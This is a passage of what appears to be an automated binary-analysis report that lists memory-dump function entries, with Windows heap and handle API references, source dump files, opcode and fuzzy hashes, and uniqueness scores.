                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: ChangeCloseFindNotification
                                                                • String ID: winClose
                                                                • API String ID: 2591292051-4219828513
                                                                • Opcode ID: 853bbd4b1c2e83f5b1c7369aa0737657eb085aa6c6c2a89f887c541ecb86a77d
                                                                • Instruction ID: de1bf6abc9119a71ac93b680da433308294335c472035bcbfcf673d0eec18655
                                                                • Opcode Fuzzy Hash: 853bbd4b1c2e83f5b1c7369aa0737657eb085aa6c6c2a89f887c541ecb86a77d
                                                                • Instruction Fuzzy Hash: 85F0FC753003066FFB211B6ADD949577FD9EFC45A17044035EACDC2160DB72D8418B50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _free.LIBCMT ref: 010356AD
                                                                  • Part of subcall function 01035710: RtlAllocateHeap.NTDLL(00000000,010227CC,00000000,?,01024253,00000002,00000000,010A4A32,?,?,01097AEE,010227CC,00000004,00000000,00000000,00000000), ref: 01035742
                                                                • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,0103A3D6,?,00000004,00000004,?,00000000,?,01031644,?,00000004), ref: 010356E9
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: AllocateHeap$_free
                                                                • String ID:
                                                                • API String ID: 1482568997-0
                                                                • Opcode ID: a86c44ccbb26b453eb48709e4e4d7dba710edc142a3ede5f213a7c6273ada3f7
                                                                • Instruction ID: 19c588c9e977530ea3b1eeead7839be33085f881755d61941598c5286b2adc82
                                                                • Opcode Fuzzy Hash: a86c44ccbb26b453eb48709e4e4d7dba710edc142a3ede5f213a7c6273ada3f7
                                                                • Instruction Fuzzy Hash: 1AF02131501612BADB712A2AFC00F9F3BAC9FE5671B140059FDD4D71F0DB30C400A5A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 66d8ee957bfad907b0fc372855a794ecf980815f6539e751f18207387ac73c51
                                                                • Instruction ID: 44c4dda35e8a86a0c471c472f148697ee917ef379e4957f1f5678b9d48adf722
                                                                • Opcode Fuzzy Hash: 66d8ee957bfad907b0fc372855a794ecf980815f6539e751f18207387ac73c51
                                                                • Instruction Fuzzy Hash: 0A313A76A006149F8B15CF5DC48489DBBF5FFCD32072986A5E669EB360D330AD019B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 01033EB5: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01034408,00000001,00000364,00000003,000000FF,?,01024253,00000002,00000000,010A4A32), ref: 01033EF6
                                                                • _free.LIBCMT ref: 0103A5D8
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                Similarity
                                                                • API ID: AllocateHeap_free
                                                                • String ID:
                                                                • API String ID: 614378929-0
                                                                • Opcode ID: 4b1b48d91a131ce7ecfe0161ac3101a294dc7d12da31d532177fce5abc178839
                                                                • Instruction ID: 5ad8af1b6e287d1782659b2654b834a02662694d477fa5e35587bf3d8d677a6a
                                                                • Opcode Fuzzy Hash: 4b1b48d91a131ce7ecfe0161ac3101a294dc7d12da31d532177fce5abc178839
                                                                • Instruction Fuzzy Hash: C801D672A04316ABC3218F58D88499EFBDCFB45370F15066DE9D5E76C0D7706910CBA4
                                                                Uniqueness
                                                                • Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3d8e2d5905d4991f3e4aff7adec2abb92bb0a8e1297d698dd54e4ca93c343161
                                                                • Instruction ID: c667ec2335b09e9c722c21b903684157d9ef577ff281a243d22eef9f3a526352
                                                                • Opcode Fuzzy Hash: 3d8e2d5905d4991f3e4aff7adec2abb92bb0a8e1297d698dd54e4ca93c343161
                                                                • Instruction Fuzzy Hash: 92F0E9A900D3C31FE7A323BC5C942A97FA48E43164B1401E7F5D185093D907140243B3
                                                                Uniqueness
                                                                • Uniqueness Score: -1.00%

                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,010227CC,00000000,?,01024253,00000002,00000000,010A4A32,?,?,01097AEE,010227CC,00000004,00000000,00000000,00000000), ref: 01035742
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: f5c533a593658f604dd68bfab186b6502bf448921fea8fee2fcc79acfd33971e
                                                                • Instruction ID: 80c9cfacb3d21eb2b04d1d6237b9f16679661455a72a115b8fd7d6c34afff8f4
                                                                • Opcode Fuzzy Hash: f5c533a593658f604dd68bfab186b6502bf448921fea8fee2fcc79acfd33971e
                                                                • Instruction Fuzzy Hash: 25E06535111626D6EA632A6AFC04B9E7A9CBBC16B0F050561EDD5961E0DB24D80186E2
                                                                Uniqueness
                                                                • Uniqueness Score: -1.00%

                                                                APIs
                                                                • _free.LIBCMT ref: 010282BB
                                                                  • Part of subcall function 01033F12: RtlFreeHeap.NTDLL(00000000,00000000,?,0103AF4B,?,00000000,?,00000002,?,0103B1F0,?,00000007,?,?,0103B865,?), ref: 01033F28
                                                                  • Part of subcall function 01033F12: GetLastError.KERNEL32(?,?,0103AF4B,?,00000000,?,00000002,?,0103B1F0,?,00000007,?,?,0103B865,?,?), ref: 01033F3A
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                Similarity
                                                                • API ID: ErrorFreeHeapLast_free
                                                                • String ID:
                                                                • API String ID: 1353095263-0
                                                                • Opcode ID: 4fa6bf60a0e12c7425d921ae826977d40f95b724c2506598cc2b87a6e92e61d7
                                                                • Instruction ID: 853302cdb883c4cfa69eab6bd540ba12cc5c3945ed7892f2425c0fd22ce17883
                                                                • Opcode Fuzzy Hash: 4fa6bf60a0e12c7425d921ae826977d40f95b724c2506598cc2b87a6e92e61d7
                                                                • Instruction Fuzzy Hash: F2C0803140410CFBCB00DF85E905A5D7B7CD780320F104184FC4C07200DA729E1055C0
                                                                Uniqueness
                                                                • Uniqueness Score: -1.00%

                                                                APIs
                                                                • FindCloseChangeNotification.KERNELBASE(?,?,010AE820,00000000,00000000,?,00000000), ref: 010AE82E
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                Similarity
                                                                • API ID: ChangeCloseFindNotification
                                                                • String ID:
                                                                • API String ID: 2591292051-0
                                                                • Opcode ID: b999f164dd70ad88dc5f16a9d82b772676eb058187340cdceb0958c6c8ad111b
                                                                • Instruction ID: fb5eced957b7757e4fe700c3ee29d5c35eff4bf4b5cc0ea84ad2a1a722cfac1c
                                                                • Opcode Fuzzy Hash: b999f164dd70ad88dc5f16a9d82b772676eb058187340cdceb0958c6c8ad111b
                                                                • Instruction Fuzzy Hash: D5A0113008020CFB8E002A82E808888BF2CEA002A0B828020F88C80022CB33A8208AA0
                                                                Uniqueness
                                                                • Uniqueness Score: -1.00%

                                                                Non-executed Functions